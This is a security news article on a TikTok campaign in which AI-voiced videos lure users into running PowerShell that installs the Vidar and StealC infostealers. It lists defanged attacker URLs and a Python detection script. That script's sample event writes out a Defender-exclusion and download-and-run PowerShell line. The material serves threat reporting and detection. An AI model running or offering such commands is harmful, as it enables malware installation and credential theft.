A sophisticated social engineering campaign is leveraging the viral power of TikTok to distribute dangerous information-stealing malware, specifically Vidar and StealC.
This alarming trend marks a shift in cybercriminal tactics, moving away from traditional methods like fake CAPTCHA pages to exploiting the vast user base and algorithmic reach of social media platforms.
Unlike previous attacks that relied on detectable malicious code or compromised websites, this campaign uses carefully crafted, potentially AI-generated video content to deceive users into executing harmful PowerShell commands under the guise of activating legitimate software such as the Windows OS, Microsoft Office, or Spotify.
With one video reportedly garnering over 500,000 views, the potential scale of this threat is staggering, posing significant risks to both individual users and businesses through data exfiltration and credential theft.
New Social Engineering Threat on Social Media
The campaign operates through TikTok accounts such as @gitallowed, @zane.houghton, and others, which have since been deactivated.

According to a Trend Micro report, these accounts posted faceless videos with AI-generated voices that gave users step-by-step instructions, guiding them to open PowerShell via the Windows + R shortcut and execute scripts from URLs such as hxxps://allaivo[.]me/spotify.
These scripts initiate a malicious chain of execution: they create hidden directories under the APPDATA and LOCALAPPDATA folders, add those directories to Windows Defender's exclusion list to evade detection, and download secondary payloads identified as Vidar or StealC from domains such as hxxps://amssh[.]co/file.exe.
Hackers Exploit TikTok’s Algorithmic Reach
The malware establishes persistence through registry keys and connects to command-and-control (C&C) servers, some of which abuse legitimate platforms like Steam and Telegram to obscure their infrastructure.
This method of delivery, relying entirely on visual and auditory social engineering rather than embedded malicious code, makes traditional detection mechanisms less effective and highlights the evolving nature of cyber threats.
For businesses and individuals, the implications are severe, as these attacks exploit user trust rather than technical vulnerabilities.
Security strategies must adapt by integrating social media threat intelligence to monitor emerging campaigns, employing behavioral analysis to detect anomalous activities like unexpected PowerShell executions, and enhancing user education to recognize and report suspicious content.
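The behavioral detection suggested above can be prototyped against PowerShell Script Block Logging (Event ID 4104) text. The following is an added example, not Trend Micro's hunting query or the campaign's script: the rule regexes, rule names, and the 4104-style sample events are constructed assumptions that mirror the techniques the article describes (Defender exclusions on APPDATA/LOCALAPPDATA, hidden directories, download-and-run, Run-key persistence).

```python
import re

# Each rule is (name, regex). The patterns are assumptions built from the
# behaviour described in the article, not signatures for the real script.
RULES = [
    ("defender_exclusion_appdata",
     re.compile(r"Add-MpPreference\b[^\n]*-ExclusionPath\b[^\n]*"
                r"(\$env:(LOCAL)?APPDATA|%(LOCAL)?APPDATA%|\\AppData\\)", re.I)),
    ("hidden_directory",
     re.compile(r"(Attributes\s*=\s*['\"]?Hidden|attrib(\.exe)?\s+\+h)", re.I)),
    ("download_and_execute",
     re.compile(r"(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadFile|DownloadString)"
                r"[^\n]*(\|\s*iex|Invoke-Expression|Start-Process|\.exe)", re.I)),
    ("run_key_persistence",
     re.compile(r"CurrentVersion\\Run\b", re.I)),
]

def score_script_block(script: str) -> list[str]:
    """Return the names of every rule the logged script block matches."""
    return [name for name, rx in RULES if rx.search(script)]

def triage(events: list[dict]) -> list[dict]:
    """Flag events matching two or more rules; a single hit (for example one
    Defender exclusion) is common in legitimate admin and developer scripts."""
    flagged = []
    for ev in events:
        hits = score_script_block(ev["script"])
        if len(hits) >= 2:
            flagged.append({"id": ev["id"], "hits": hits})
    return flagged

# Constructed sample 4104-style events (not real captured data).
SAMPLE_EVENTS = [
    {"id": 1, "script": (
        "$d = Join-Path $env:LOCALAPPDATA 'svc'; New-Item $d -ItemType Directory | Out-Null\n"
        "(Get-Item $d).Attributes = 'Hidden'\n"
        "Add-MpPreference -ExclusionPath $env:APPDATA, $env:LOCALAPPDATA\n"
        "iwr https://example.invalid/file.exe -OutFile $d\\file.exe; Start-Process $d\\file.exe")},
    # Benign-looking developer tooling exclusion: one hit only, not flagged.
    {"id": 2, "script": "Add-MpPreference -ExclusionPath $env:LOCALAPPDATA\\Docker"},
    {"id": 3, "script": "Get-ChildItem $env:APPDATA -Recurse | Measure-Object"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f['id']}: {', '.join(f['hits'])}")
```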

Trend Vision One offers a robust defense against such threats, providing AI-powered cybersecurity tools, threat insights, and hunting queries to detect indicators of compromise (IOCs) associated with this campaign.
As cybercriminals continue to weaponize popular platforms like TikTok, proactive measures and awareness are critical to mitigating the risks of mass compromise.
Indicators of Compromise (IOCs)